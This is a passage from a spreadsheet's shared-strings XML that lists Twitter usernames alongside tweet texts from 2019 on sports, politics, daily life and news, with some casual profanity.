    <t>C15MNW</t>
  </si>
  <si>
    <t>@andrewmanganVO On behalf of all the sensible people in Britain (yes some of us do remain!), I want to apologise to you and all the Irish people, for having to suffer this complete and utter twaddle! Mea culpa! 😢</t>
  </si>
  <si>
    <t>MarriaaMaria</t>
  </si>
  <si>
    <t>Melanin too dark to throw her shade away. #BrownSkinGirl</t>
  </si>
  <si>
    <t>viewingnyc</t>
  </si>
  <si>
    <t>This Vintage Photograph Shows Herald Square and the 6th Ave El Circa 1905 https://t.co/YPVLNJfyhE https://t.co/F8ntdBfxvD</t>
  </si>
  <si>
    <t>AndyHermanNFL</t>
  </si>
  <si>
    <t>Overall I’ve been really impressed by the first 3 days of practice with Matt LaFleur. Solid pacing, smart transitions, everything had a purpose and you could see improvement over three days. It’s better than I would have ever expected from a rookie head coach in his 1st camp.</t>
  </si>
  <si>
    <t>SeattleNewsHeds</t>
  </si>
  <si>
    <t>Seattle (WA) Times: Bolton meets Japanese officials to discuss Iran, South Korea</t>
  </si>
  <si>
    <t>_m_james</t>
  </si>
  <si>
    <t>@montanaisntreal suffer the fuck on</t>
  </si>
  <si>
    <t>MineOthers</t>
  </si>
  <si>
    <t>Are you having a nice day 💛💛💛 Do you like my #smile I'm sending you 🙂🙂🙂 I like to smile 🙂🙂🙂 My Mummy has a beautiful smile I love my Mummy 💖💖💖 I like yellow and purple 💛💜💜 yellow is my favourite colour 💛💛💛 and I love purple #flowers too💜💜💜...misha 💞 https://t.co/bAgj0lv1R3</t>
  </si>
  <si>
    <t>steffiaspin</t>
  </si>
  <si>
    <t>@_canndo @mark_carrigan I said ‘I want to get married’ and he said ‘alright’ #Romantic</t>
  </si>
  <si>
    <t>lauren_novacek</t>
  </si>
  <si>
    <t>Goals: have as many hot sauce options as the Barnes 🙌🏻🔥</t>
  </si>
  <si>
    <t>Mind1Official</t>
  </si>
  <si>
    <t>Thanks for spending your Sunday afternoon with the #hive and myself! More #starbound with the mini minds tomorrow! https://t.co/DvV6kBZyTb</t>
  </si>
  <si>
    <t>JBYourBest</t>
  </si>
  <si>
    <t>Love #podcasts? Love #leadership? Me too! Check out the new #Leadership480 podcasts from @DDIworld to explore how to make the most of your next 480 minutes, 480 days, and 480 months! https://t.co/XtYqNmFrAZ https://t.co/HkBeIMkX0G</t>
  </si>
  <si>
    <t>JennaGuillaume</t>
  </si>
  <si>
    <t>Wait I jumped the gun we still have the ROSE CEREMONY #theBachelorAU</t>
  </si>
  <si>
    <t>EMcLeod_BFB</t>
  </si>
  <si>
    <t>saw Spiniello out there looking at it on Tuesday which is why I didn’t put in a 311 complaint. but it’s still going and no one was there today, so yes I did report</t>
  </si>
  <si>
    <t>seileen1</t>
  </si>
  <si>
    <t>@RepMarkMeadows @realDonaldTrump I thought Mexico was going to pay for it. You’re sticking it to your constituents!!</t>
  </si>
  <si>
    <t>mirandaaaaaf</t>
  </si>
  <si>
    <t>I think I want to go on a cruise 😅😅😅</t>
  </si>
  <si>
    <t>jmarpdx</t>
  </si>
  <si>
    <t>Keep simplicity in mind. Training to run faster is Not That Complicated. But we want to overcomplicate it, overthink it and wear it out. The hardest part is showing up and putting in the effort. If you can do that, nearly anything will work and you’ll see some improvements.</t>
  </si>
  <si>
    <t>jlofromtarn</t>
  </si>
  <si>
    <t>@TJ_HOWLER @davidohanlon @ukvoteremain @brexit_sham @mrjamesob @RoryStewartUK I don't feel governed by the EU. In fact in I'm grateful for them cos they prevent the worst excesses of our shitty governments. Both C &amp; L have become progressively more about party &amp; donors than people. The Tories might as well rename themselves the Corporate &amp; Donors party.</t>
  </si>
  <si>
    <t>RebeccaforAZ</t>
  </si>
  <si>
    <t>@FishburnDawn @RepAndyBiggsAZ @realDonaldTrump @RepRatcliffe Are you saying that if others weren't charged for lying then its all fine and dandy that the president be allowed to get away with criminal activity?</t>
  </si>
  <si>
    <t>giajzl</t>
  </si>
  <si>
    <t>if you on my private story you can NOT sit here and act like you don’t even giggle just a BIT</t>
  </si>
  <si>
    <t>brandonengel_</t>
  </si>
  <si>
    <t>@PistonsRoom The talent is there but coaching the coaching scares me I see where you’re coming from though</t>
  </si>
  <si>
    <t>LaneicLavalle</t>
  </si>
  <si>
    <t>Just Pinned to Making a passive income: Looking for a flexible side hustle to make extra money each month? Here are the best legit paid survey sites you can earn cash to supplement your income just to give your opinions! | side income | income supplement… https://t.co/qZLnewO1Mn</t>
  </si>
  <si>
    <t>ali_sutton10</t>
  </si>
  <si>
    <t>John Swift: All Goals for Reading: 2016-2019. https://t.co/HB0K7zyJpW #readingfc</t>
  </si>
  <si>
    <t>JohnMichalski16</t>
  </si>
  <si>
    <t>Healthcare should be a public utility, not a consumer good to be bought and sold in the market place.</t>
  </si>
  <si>
    <t>RoyceEdwards</t>
  </si>
  <si>
    <t>@JohnLegere @ATT @comcast @verizon All the campers could be wearing T-Mobile Tuesday backpacks...soon</t>
  </si>
  <si>
    <t>StVincentDePau9</t>
  </si>
  <si>
    <t>He reveals to us that it is He that we are seeking. #blessedisshe</t>
  </si>
  <si>
    <t>MissTemissary</t>
  </si>
  <si>
    <t>The responsibility of keeping a marriage together lies with the people *in* the marriage. Why would you expect the side chick to care about your marriage more than your husband does?</t>
  </si>
  <si>
    <t>ShamirAli786</t>
  </si>
  <si>
    <t>@DeveshKhankhoje @officialpes Does this mean we can carry legends and featured players over to pes 20?</t>
  </si>
  <si>
    <t>Thelatest782</t>
  </si>
  <si>
    <t>Greenbelt Hoping to Land New FBI Headquarters - NBC4 Washington https://t.co/pmbbRKt4kU</t>
  </si>
  <si>
    <t>CraziLife9</t>
  </si>
  <si>
    <t>@realDonaldTrump is a Nightmare! America will overcome, we just need new laws to ensure this NEVER EVER EVER Happens Again. #IStandWithElijahCummings #ElijahCummingsIsAPatriot https://t.co/zZJcgSghCJ</t>
  </si>
  <si>
    <t>progressivepush</t>
  </si>
  <si>
    <t>@theycallmebob Thank You Bob for Monday's Picker-Upper!</t>
  </si>
  <si>
    <t>hillsacp</t>
  </si>
  <si>
    <t>@BBCRadio3 @BSOrchestra @bbcproms Another reason for non-inclusion of course, is because the moon is not a planet ... it's a satellite.</t>
  </si>
  <si>
    <t>muzykb</t>
  </si>
  <si>
    <t>@CNNTonight Why is trump running around deciding who needs to be attacked by him? That is weird. Hope I didn't just break some mundane rule, @Twitter</t>
  </si>
  <si>
    <t>dickkearns</t>
  </si>
  <si>
    <t>@NewsSiena Prayers for Bro Ed, a friend since our days as students at @StBonaventure Always filled with Franciscan spirit and that contagious smile. Time for 🙏 and hope.</t>
  </si>
  <si>
    <t>newyorkdailyjob</t>
  </si>
  <si>
    <t>Video Editor https://t.co/JZpdmnwnSO charity Location : New York NY US You’ll edit new and existing footage and deliver video content that will be used for major campaigns, events, and all social media platforms.... More &gt;&gt; jobs by charity Location : New York N... https://t.co/8W2M7XWqDp</t>
  </si>
  <si>
    <t>C4CEO</t>
  </si>
  <si>
    <t>@HZardoz @DLoesch We really need to. We're going purple fast</t>
  </si>
  <si>
    <t>StacyjcashW</t>
  </si>
  <si>
    <t>@r_a_salvatore Could you write, with Terry Brooks, a Bewiched movie or tv production. The magic and mundane is what you are both. great at. The rest is obvious.</t>
  </si>
  <si>
    <t>SkagitKID</t>
  </si>
  <si>
    <t>We, unfortunately, don't have a sponsor for tomorrow's playdate. That doesn't mean you should stay home. NOPE - it's going to be a nice day and kids need to get out and play and all of their parents need to meet each other and build our local parent... https://t.co/HSeU30v9ZZ</t>
  </si>
  <si>
    <t>ArisToneYazzie</t>
  </si>
  <si>
    <t>@becalvxo @icexqueen Having all of your happiest moments at once and the next They are all gone but you don't why they are gone</t>
  </si>
  <si>
    <t>MoandtheCity84</t>
  </si>
  <si>
    <t>@iam_shaniquaa Gurllllllllllll! I wanted her to give Evelyn that work!</t>
  </si>
  <si>
    <t>GeoffWSYX6</t>
  </si>
  <si>
    <t>At @boyscouts camp in Delaware today (Camp Lazarus is an awesome facility, btw) — and of this year’s 375 campers, almost 100 are girls! They’re shooting arrows, aiding the staff as activity leaders, playing the bugle and eating lunch, right alongside the boys. https://t.co/DVOUzJpyKw</t>
  </si>
  <si>
    <t>LFraserAC</t>
  </si>
  <si>
    <t>@realdanlyons People will believe this. People who were living at the time will believe this. Really scary.</t>
  </si>
  <si>
    <t>Jassiya_</t>
  </si>
  <si>
    <t>@Gods1Nigga I may just use these sugar daddies on this app 🤪 I just want to be slim🥺</t>
  </si>
  <si>
    <t>HairStarLLC</t>
  </si>
  <si>
    <t>Lordddd n I'm still up looking retarded🤦🏽‍♀️ 🤣</t>
  </si>
  <si>
    <t>Posture_Pal</t>
  </si>
  <si>
    <t>During World War II, OSS's chief scientist planned to take down Hitler by injecting feminine hormones into his personal vegetable garden. It was one far-fetched scheme among many, writes @sam_kean. https://t.co/iN1D4o93pb</t>
  </si>
  <si>
    <t>benyarthur</t>
  </si>
  <si>
    <t>Hearing a lot of ‘’we love you!!’’ for DeShawn Shead early in practice. Many Seahawks fans obviously happy he’s back in Seattle. #SeahawksCamp</t>
  </si>
  <si>
    <t>leslie_lizzette</t>
  </si>
  <si>
    <t>@ViviOcampo9 This was the bartender 😂 Once we moved to coyote was when it went downhill for me 💀 https://t.co/FuLUqRPOR3</t>
  </si>
  <si>
    <t>sheryl_monk</t>
  </si>
  <si>
    <t>@KevasRobert Thank you, Huck! Reported and blocked!</t>
  </si>
  <si>
    <t>Irv_Daddy918</t>
  </si>
  <si>
    <t>@BoiseHawks #BooneBomb More on the way!</t>
  </si>
  <si>
    <t>CleverMarketg</t>
  </si>
  <si>
    <t>Review the following really good quote https://t.co/BtfBDvy71K</t>
  </si>
  <si>
    <t>patsoxfan80</t>
  </si>
  <si>
    <t>@AGT I strongly believe that some of the wrong acts went home.</t>
  </si>
  <si>
    <t>iamseanic</t>
  </si>
  <si>
    <t>Another fabulous video from @ExoParadigmGmr -- and about my favorite N64-era platformer, even! Banjo-Kazooie stole my heart 20 years ago and this is such a wonderful critique/review. Please watch his videos. They're so well-researched and thorough. https://t.co/P958Xq0i4M</t>
  </si>
  <si>
    <t>arrowheadsaddle</t>
  </si>
  <si>
    <t>@SaraCarterDC @RepJerryNadler Let facts remain others' fictions. Most people realize this was all Political Theater and Mueller was chosen to be the protector of the Deep State /Trump antagonists, Obama et al. Fortunately, they failed to oust Trump but we the Taxpayers wasted a whole lot of time and money ! !</t>
  </si>
  <si>
    <t>AnnmarieColvan</t>
  </si>
  <si>
    <t>@adam_tommo98 Me 🙌🏻 Mon the Scots 🏴󠁧󠁢󠁳󠁣󠁴󠁿</t>
  </si>
  <si>
    <t>bespoketwins</t>
  </si>
  <si>
    <t>Ya’ll better know how this game works. WE NEVER GIVE THEM PERMISSION AND WE NEVER GIVE THEM CONSENT AS WE STAND ON OUR OWN JURISDICTION...HOUSE AUSTIN https://t.co/gTDHh5Ll2b</t>
  </si>
  <si>
    <t>francsaid_</t>
  </si>
  <si>
    <t>@Prettyymichee Your attitude is terrible! The absolute worst !</t>
  </si>
  <si>
    <t>Freedom_220</t>
  </si>
  <si>
    <t>@GeorgePapa19 who can ask for a better tweet than this before sleep 🌙</t>
  </si>
  <si>
    <t>AndyInPlace</t>
  </si>
  <si>
    <t>@JohnThorneAIW Bunkhouse coming for that Intense strap?</t>
  </si>
  <si>
    <t>CPHO_Canada</t>
  </si>
  <si>
    <t>Congrats to PHAC's Adam Burgener on delivering an #IAS2019 plenary! Dr. Burgener’s work on the #microbiome's role in #HIV transmission &amp; pathogenesis is helping to propel advances in research, prevention &amp; treatment. #PHACSci https://t.co/4VvFJ9KHex</t>
  </si>
  <si>
    <t>laceyhaines</t>
  </si>
  <si>
    <t>@united .com and the app booking tools are down. Anxiously awaiting an update from your IT department.</t>
  </si>
  <si>
    <t>ConceitedBrat18</t>
  </si>
  <si>
    <t>I WANT MY OWN SHIT 😩I can’t wait but imma be patient but I’m ready whenever you ready for me to have it Lord.</t>
  </si>
  <si>
    <t>fintech_connect</t>
  </si>
  <si>
    <t>Are We Exiting The #Blockchain Wild Wild West? #Cryptocurrency is at a cross roads. For years it has been on the outskirts of the mainstream, with concerns around #regulation and #security. With the launch of Libra – are we going to witness a change? https://t.co/MbuSE1ihXa https://t.co/I9DBveDp9y</t>
  </si>
  <si>
    <t>RickyGrohe</t>
  </si>
  <si>
    <t>Check out THE LIBRARIANS SCREEN USED EP 306 Set of 2 Airplane Cockpit Maps seen with Baird https://t.co/QUMLR5elPN via @eBay</t>
  </si>
  <si>
    <t>chefrizzo</t>
  </si>
  <si>
    <t>in my defence i saw ..Something earlier and thought it was a joke but this is cool</t>
  </si>
  <si>
    <t>Phil_Anime</t>
  </si>
  <si>
    <t>CAN WE JUST SKIP TO OCT? OR MAYBE DEC? PLS JUSTT UGGGHHH</t>
  </si>
  <si>
    <t>jawnpawlow</t>
  </si>
  <si>
    <t>it makes me love photography so much more when people appreciate the photos i take for them :)</t>
  </si>
  <si>
    <t>robmuh</t>
  </si>
  <si>
    <t>@crisenitan Or use #lynx and blow everything else away only pulling up in @brave when you need visual. #chromeisso2005</t>
  </si>
  <si>
    <t>alexdhalliday</t>
  </si>
  <si>
    <t>Great afternoon in @FriendshipGloss with @walmsleyalan and @dublinroad1 great craic despite the Peter Barlow digs 🤣☘️☘️☘️ absolutely brilliant tanks guys 👍🍺☘️ https://t.co/wzQnjVO4dq</t>
  </si>
  <si>
    <t>therobipvc</t>
  </si>
  <si>
    <t>@JohnDelapa EXACTLY. Sa Bacolod ko ga work before and same routine ra which is makalagot hahahaha</t>
  </si>
  <si>
    <t>txswede2010</t>
  </si>
  <si>
    <t>@peterbakernyt He said that Trump and his associates worked with Russia. YOU can read, right? Quit doing this lazy writing and start fucking reporting!</t>
  </si>
  <si>
    <t>ZombieMonkey7</t>
  </si>
  <si>
    <t>@oofuris BTW, only true members of the Golden Deer can join their exclusive Minecraft server https://t.co/Bn1PWdXFLy</t>
  </si>
  <si>
    <t>FCA_HQ</t>
  </si>
  <si>
    <t>@dafacles Ay caramba #DreamJob ! I'm seeking contributors like you with amazing roles to #BeKind and #inspire young #CareerSeekers. Visit our site https://t.co/zjzkoehMbK and help a young person #Realize their potential!</t>
  </si>
  <si>
    <t>ollyeller</t>
  </si>
  <si>
    <t>Destroy the Earth in the comfort of your own home https://t.co/spsumM17N8 #vacationmusing #UntilIreturn</t>
  </si>
  <si>
    <t>Chr1sHall</t>
  </si>
  <si>
    <t>One of the few areas of limestone pavement in the Peak District can be found at High Edge just south of Buxton. I was there yesterday evening, the limestone being complemented by wild flowers https://t.co/eMRnTqV4Mx</t>
  </si>
  <si>
    <t>sistersofmoon</t>
  </si>
  <si>
    <t>Happy birthday Beatrix Potter: the author’s legacy 150 years on https://t.co/tQUkIZMHvc</t>
  </si>
  <si>
    <t>sdlipton</t>
  </si>
  <si>
    <t>I just earned the 'Beer of the World (Level 4)' badge on @untappd! https://t.co/20ndQ2vWuD</t>
  </si>
  <si>
    <t>dkneezjones1</t>
  </si>
  <si>
    <t>@psychdr100 Have you noticed that visitors who are Democrats come away with a completely different impression than Republicans? I am waiting for a Republican to come away saying the place was so nice that they are calling a travel agent to book a 2 week stay for a family vacation.</t>
  </si>
  <si>
    <t>MrxsGucci</t>
  </si>
  <si>
    <t>Easton to finish this last bit of shopping</t>
  </si>
  <si>
    <t>EmGoodwell</t>
  </si>
  <si>
    <t>🎒FREE BACKPACKS &amp; SCHOOL SUPPLIES at select Boost Mobile Locations! The dates vary based on your area, I have linked the location finder in my bio!⁣ ⁣⁣ 🏫Thank you to thefreebieguy for the post 🤗 ✅ LINK IN BIO… https://t.co/DA0B7w8YL3</t>
  </si>
  <si>
    <t>IHoop_Spalding</t>
  </si>
  <si>
    <t>Man The Licking Damn Near Nasty Asf Y’all Can Keep That Shit..</t>
  </si>
  <si>
    <t>are_marines</t>
  </si>
  <si>
    <t>@nancylee2016 @SpeakerPelosi @SpeakerPelosi yep we want to see how much of our tax money you spent without asking</t>
  </si>
  <si>
    <t>Jules_Clarke</t>
  </si>
  <si>
    <t>@MarpleJane @fauxpaschick @tmcsjgw18 @Sharpzilla @WilmaJazz @MarkRav78751590 @TheLaughingNoam @krustysghost @chavezglen1755 @keriRN @leftferret maybe the cost of a t-shirt to portray that thought without having to say it multiple times? https://t.co/oaXWsaYPt8 I APOLOGISE . BUT THAT EXISTS</t>
  </si>
  <si>
    <t>gstreetfabrics</t>
  </si>
  <si>
    <t>Three Days Left - Summer Sale with Extra Savings Coupons. Savings Throughout the Store! https://t.co/EAhLBotJG1 https://t.co/d8TyCgJqeF</t>
  </si>
  <si>
    <t>julesneonfawkes</t>
  </si>
  <si>
    <t>@Swayzefunk @MeganMcDuffee @nightride__fm @XENNONofficial Oh, Megan does many a thing for the scene. Besides collaborating with everyone and their sister, she pushes out amazing music and vocals that many people can learn from. I need not mention her other hobby.</t>
  </si>
  <si>
    <t>SimplyManageGuy</t>
  </si>
  <si>
    <t>Great talk by ⁦⁦@mindscapeterry⁩ on the psychology in #selling at monthly ⁦@WBBClub⁩ business networking breakfast ⁦@WebbsGC⁩ this morning #WorcestershireHour https://t.co/6G2tfE1uCI</t>
  </si>
  <si>
    <t>CBS21NEWS</t>
  </si>
  <si>
    <t>Police say the photos showed the young boy naked on a bed. https://t.co/X5RSUGN6XO</t>
  </si>
  <si>
    <t>BohemianBeaut</t>
  </si>
  <si>
    <t>I’m too old for this shit</t>
  </si>
  <si>
    <t>SMCoulombeau</t>
  </si>
  <si>
    <t>@Rooneroo Oh it WILL (if the skin is 400 degrees)</t>
  </si>
  <si>
    <t>jonxgenius</t>
  </si>
  <si>
    <t>@JayMichayy They undermine the process.</t>
  </si>
  <si>
    <t>YoderReports</t>
  </si>
  <si>
    <t>Firefighters are responding to a reported electrical fire at the @WellSpan Behavioral Health center on Route 272 in #Ephrata. Crews indicated smelling an electrical smell inside a closet. The building has been evacuated. https://t.co/q6RKMej4H2</t>
  </si>
  <si>
    <t>Asikaa604</t>
  </si>
  <si>
    <t>@zerrudo_ You here for twirch vancouver?</t>
  </si>
  <si>
    <t>waynefromwpg</t>
  </si>
  <si>
    <t>Have you ever wondered or wanted to live in Stephen Harper's World/House, well, now you can! Stephen has moved on, to a life to Bragg Creek &amp; his Calgary home just hit the market! Political Skeleton in the closet are yours if you find them! 🤣 https://t.co/6zPTNlNM64</t>
  </si>
  <si>
    <t>Innocen85794076</t>
  </si>
  <si>
    <t>Gutless hack Kieran Gilbert going all soft and quiet with K.Keneally If Gilbert is too shit scared of bully girl Keneally, because that's what it looks like, let somebody more capable to at least ask a hard question of the grating Yank !</t>
  </si>
  <si>
    <t>Flavyyy_</t>
  </si>
  <si>
    <t>do yall remember when CNN literally doxxed a teen last year for a trump meme? HUH</t>
  </si>
  <si>
    <t>WillCaskey</t>
  </si>
  <si>
    <t>@QueenMab87 Wasn't aware of the last item. That's great</t>
  </si>
  <si>
    <t>Shawn_Phillips</t>
  </si>
  <si>
    <t>@erinbiba @MollyJongFast Yep... the end of expertise wrote @RadioFreeTom</t>
  </si>
  <si>
    <t>wesley778</t>
  </si>
  <si>
    <t>This Huge New 'Friends' Pop-Up Features Iconic Sets, Props https://t.co/eLxCulveEr</t>
  </si>
  <si>
    <t>ScribalPractice</t>
  </si>
  <si>
    <t>6th floor views at @pnca So incredibly excited for this program! @MfaPnca https://t.co/Oi6vqs38tR</t>
  </si>
  <si>
    <t>hopegrown</t>
  </si>
  <si>
    <t>Cannabis products applied topically communicate with the CB2 receptors and can help immensely where there is pain &amp; inflammation. #wellness</t>
  </si>
  <si>
    <t>TheresaBrown</t>
  </si>
  <si>
    <t>"Health equity is declining as income inequality grows, JAMA study shows" We're the richest country in the world, yet we can't take care of the poorest among us. I don't understand. https://t.co/aO8PCnmC4b</t>
  </si>
  <si>
    <t>MaJesticBri_</t>
  </si>
  <si>
    <t>I just want to be able to afford the lifestyle that I want https://t.co/wDOL1xBQku</t>
  </si>
  <si>
    <t>JagM_85</t>
  </si>
  <si>
    <t>@GeoffWilliams54 @TiceRichard @brexitparty_uk @BorisJohnson Good luck with that. First you put all your hopes on a clown and then the actual Circus 😂</t>
  </si>
  <si>
    <t>joshnicholson11</t>
  </si>
  <si>
    <t>@PalfreymanM with the money you lot are splashing there's probably gold plated Parkers coming out of their ears!</t>
  </si>
  <si>
    <t>MidnightVict</t>
  </si>
  <si>
    <t>@KabeldotTv I told the ladies in the staff room and one lady says that her son does it so she takes the empty rolls and fills up his pillowcase with them. I don't think he has noticed yet but she swears he will notice soon enough.</t>
  </si>
  <si>
    <t>DCTaronteV</t>
  </si>
  <si>
    <t>#Research finds #Alterations in the #brain’s #Regional #Homogeneity Assessed by #fMRI in Patients with #Migraine Without Aura. #neurology #neuroscience #functional https://t.co/rUYFDznRrY</t>
  </si>
  <si>
    <t>football_roos</t>
  </si>
  <si>
    <t>@AndyPaschalidis @TheWorldGame @Craig_Foster @Bashola66 @LucyZelic @GeorgeDonikian @RNogarotto @miketomalaris @SBSNews @peterfilopoulos @peterkat10 @Elia_Santoro Let us remember the great man https://t.co/dYNSenjAYY RIP Les</t>
  </si>
  <si>
    <t>ser_seres</t>
  </si>
  <si>
    <t>Self compassion is simply giving the same kindness to ourselves that we would give others</t>
  </si>
  <si>
    <t>Liketraveling1</t>
  </si>
  <si>
    <t>Checked in at BJ's Restaurant &amp; Brewhouse in CA - Huntington Beach and earned points on their BJ's Premier Rewards card.</t>
  </si>
  <si>
    <t>luli_carabez</t>
  </si>
  <si>
    <t>Can we talk about the choreography!? 💚💚 it's was beautiful 👏💚💚 #HighwayToHeavenMV #NCT127 @NCTsmtown_127 @NCTsmtown https://t.co/knPRFy85oi</t>
  </si>
  <si>
    <t>spncryn</t>
  </si>
  <si>
    <t>@joshshepperd I know that I personally only started using it -- it was my first music streaming service -- because a friend of mine wanted to share a playlist she'd made in it; prior to that, which was around 2015 or so, all of my music was downloaded, stored and transferred locally</t>
  </si>
  <si>
    <t>beckyclarelewis</t>
  </si>
  <si>
    <t>When yourself and @SMurfs31 have spent the weekend rubbing shoulders with @LanaParrilla @robertcarlyle_ @emiliederavin @ChristinaRicci @jasonsfolly and @MatthewLillard, going back to work and normality is kind of depressing 😭 #LFCC https://t.co/zeHKGdmxch</t>
  </si>
  <si>
    <t>SocialBizBrand</t>
  </si>
  <si>
    <t>Apply These 9 Techniques to Stay Motivated in Your Startup https://t.co/1MJ9NJSyK2</t>
  </si>
  <si>
    <t>tashadrinkstea</t>
  </si>
  <si>
    <t>@LECrockett I’ll reserve you a seat and a pot of tea 😉</t>
  </si>
  <si>
    <t>dragonhaewk</t>
  </si>
  <si>
    <t>@SrMario_Art @AirmanR34 @RiseFallNick This is what happens when the page stops at THE WRONG TIME!</t>
  </si>
  <si>
    <t>nataliegallops</t>
  </si>
  <si>
    <t>@999HappyHops My worst motel record is definitely the Baltimore red roof that had a knife under the mattress</t>
  </si>
  <si>
    <t>[ASAP] Link between Photoelectron Circular Dichroism and Fragmentation Channel in Strong Field Ionization https://t.co/g1VyLpHtuP #chemicalphysics https://t.co/uDIL1tp3ww</t>
  </si>
  <si>
    <t>sammihasaface</t>
  </si>
  <si>
    <t>@_marisa_wong ME TOO! Today’s my last day at my grams and then I work and pack and AHHHHHH were going to have so much fun :)</t>
  </si>
  <si>
    <t>HitchingRoger</t>
  </si>
  <si>
    <t>@zanderzootPWi @IanJamsie @BBCNews @greeneyedk8 Never said I was perfect when I was younger but I do believe you are the person in control and as such you take responsibility for your driving.</t>
  </si>
  <si>
    <t>CdotS12</t>
  </si>
  <si>
    <t>Whether I know you or not, if a dope opportunity or job or goal was reached by you and it graces my TL, Im definitely RTing it. Good vibes!!</t>
  </si>
  <si>
    <t>suzyuzyy</t>
  </si>
  <si>
    <t>I really don’t have even a single outfit for Afro nation</t>
  </si>
  <si>
    <t>commiegirl1</t>
  </si>
  <si>
    <t>and Evan was so mean and funny and mean to these idiots! https://t.co/F9xaGmsx7D</t>
  </si>
  <si>
    <t>Jamesru12</t>
  </si>
  <si>
    <t>@KateHoeyMP @BBCNews @SkyNews @10DowningStreet Not just you. The lefty undemocratic media are absolutely sh*****g themselves that they've lost the battle and the war. 1-0 @BorisJohnson</t>
  </si>
  <si>
    <t>RightScares</t>
  </si>
  <si>
    <t>@MajesticResists Political cartoonist are the best!</t>
  </si>
  <si>
    <t>daddyschrutebux</t>
  </si>
  <si>
    <t>@eve_ettinger Mulder loooves toilet/paper towel tubes. They are his favorite toy. He will carry the paper towel ones around like some huge cigarette and prance with it a bit before shredding it to bits</t>
  </si>
  <si>
    <t>lvfallin</t>
  </si>
  <si>
    <t>@pataunt @ljcambria @realDonaldTrump Not the case.</t>
  </si>
  <si>
    <t>JEHoyle1971</t>
  </si>
  <si>
    <t>I like to think I can read people. Maybe not all, but some. If you don't acknowledge me, I analyze that. And I don't assume that everything I say is logical or agreed with. Some things I say merely for "shock value". Shock and awe..</t>
  </si>
  <si>
    <t>My_Truth_Today</t>
  </si>
  <si>
    <t>Rest in peace Zyklon Don ... You will be missed and remembered.</t>
  </si>
  <si>
    <t>wbellauthor</t>
  </si>
  <si>
    <t>Battle intrigue and infighting in #Nazi High Command! Read FALL EAGLE ONE https://t.co/TKqLHzwYNw #WW2 #aviation #combat #espionage #codebreaking #ASMSG #IARTG (0.16) https://t.co/ivwGxMaGyM</t>
  </si>
  <si>
    <t>slominskam</t>
  </si>
  <si>
    <t>@CNN @ChrisCuomo Oh I just smell the testosterone. 😂🤣😂</t>
  </si>
  <si>
    <t>Boogiekincaid</t>
  </si>
  <si>
    <t>@TangoWithAngo @TonyKhan was a big ECW fan I think we will get blood but not on TNT I think they leave the Hardcore stuff for PPV I believe @TonyKhan said that in an interview after 1 of them PPVS</t>
  </si>
  <si>
    <t>InTheNoosphere</t>
  </si>
  <si>
    <t>@JuliaManley3 the cure will set you free</t>
  </si>
  <si>
    <t>DougH2013</t>
  </si>
  <si>
    <t>@JohnLegere Why don’t you look at your company’s poor service in Semmes AL I bar of reception and once I get in that run running beside it I’ll lose that one bar too, even as I can see the tower. I have a phone y’all sold me. Talked with 8 magenta superstars. Hahaha. https://t.co/ucuE66zmyc</t>
  </si>
  <si>
    <t>J_Carter_BITCH_</t>
  </si>
  <si>
    <t>Your desire for security is not always about safety; it is als... More for Capricorn https://t.co/N46ZcU1qy1</t>
  </si>
  <si>
    <t>OGGM_</t>
  </si>
  <si>
    <t>What is it about your life that would cause the people that live around you to say, “I want to see Jesus”? #FoodForThought</t>
  </si>
  <si>
    <t>MichelleADunphy</t>
  </si>
  <si>
    <t>So, don't shrug it off. Be compassionate. Maybe even offer to send a calendar invite if you're asking someone to do something! :) I always appreciate that. A website compiled what it feels like to have ADHD from multiple people. Give it a read. https://t.co/x0ToHlXUx5</t>
  </si>
  <si>
    <t>dice_mellisa</t>
  </si>
  <si>
    <t>Ladies and gentleman we have lift off (55 Photos) 😲 https://t.co/WruBsSyOcy</t>
  </si>
  <si>
    <t>joceemox7</t>
  </si>
  <si>
    <t>@marklevinshow @KPycko That's just great Mark, 2.5 billion the military fund &amp; how many wars are we already in &amp; how many more does the dotard want to start. We've about used China up, so who will we borrow money for to pay soldiers?</t>
  </si>
  <si>
    <t>itshannah_marie</t>
  </si>
  <si>
    <t>I was on a date with this guy and it was going super well. I invited him over to watch a movie. He comes over, says he has to go to the bathroom (my bathroom is down the hall) and he LEAVES! Leaves my apartment. THIS. This is why i hate myself</t>
  </si>
  <si>
    <t>Explora_NM</t>
  </si>
  <si>
    <t>We want to thank everyone who donated to our Youth Apprentice Program. As you can see, they made amazing use of your donations! We can't wait to do it again next year! #yap #studioinventivo #makerspace https://t.co/Hg1Hgsjnga</t>
  </si>
  <si>
    <t>ewanm01</t>
  </si>
  <si>
    <t>@mcminnts i absolutely love Notes of a Native Son and Another Countey but my absolute fave is Giovanni’s Room😢😢😢</t>
  </si>
  <si>
    <t>VladimirFarage</t>
  </si>
  <si>
    <t>Patronizing load of cobblers, people in care homes are just old and may have dementia, but they're not children. Providing them with knitted dolls is a patronizing insult. https://t.co/J10QwlbcDN</t>
  </si>
  <si>
    <t>Goldyboy128</t>
  </si>
  <si>
    <t>My brother did a tag next to one I did and not gonna lie, that’s probably one of the highlights of the summer so far</t>
  </si>
  <si>
    <t>DigitalPhamcist</t>
  </si>
  <si>
    <t>@jon_silcock @PSNCNews @NPA1921 @LeylaHannbeck @hadar_zaman1 @YasminKarsan @RSharmaPharma @RuthENBuchan @rpharms @HeidiDW @YHCareRecord I think @GarethNHSD has the paper with the methodology. Can you post a link to it?</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>@ablunck Thanks for the ❤! We'll remind you on Sunday! https://t.co/UD49tUsoQn</t>
  </si>
  <si>
    <t>Beefiest_Angus</t>
  </si>
  <si>
    <t>@SettledRS We need more posters to buy bro. I only got 2 copys of the swamp. Gonna need another soon ;p</t>
  </si>
  <si>
    <t>ForbesLife</t>
  </si>
  <si>
    <t>These stunning images are the winners of this year's Drone Awards: https://t.co/Px0xRlVeaN https://t.co/XCeFeWOC4i</t>
  </si>
  <si>
    <t>essstrellaaa_</t>
  </si>
  <si>
    <t>i rlly be staying up late doing absolutely nothing</t>
  </si>
  <si>
    <t>doctorsinnsite</t>
  </si>
  <si>
    <t>God called the “Promised Land” His rest. Those who believed, after a good faith fight, entered! That you? @TheDavonLee @Kerrick2 @wearefaithATL https://t.co/Rx0MVvEot3</t>
  </si>
  <si>
    <t>ajooniea</t>
  </si>
  <si>
    <t>@D_Buchanan2019 @Crunchyroll go back to your hentai,,,</t>
  </si>
  <si>
    <t>Col_Porksworth</t>
  </si>
  <si>
    <t>I will not apologize for my atrocity against man I have wrought.</t>
  </si>
  <si>
    <t>CARTER61811828</t>
  </si>
  <si>
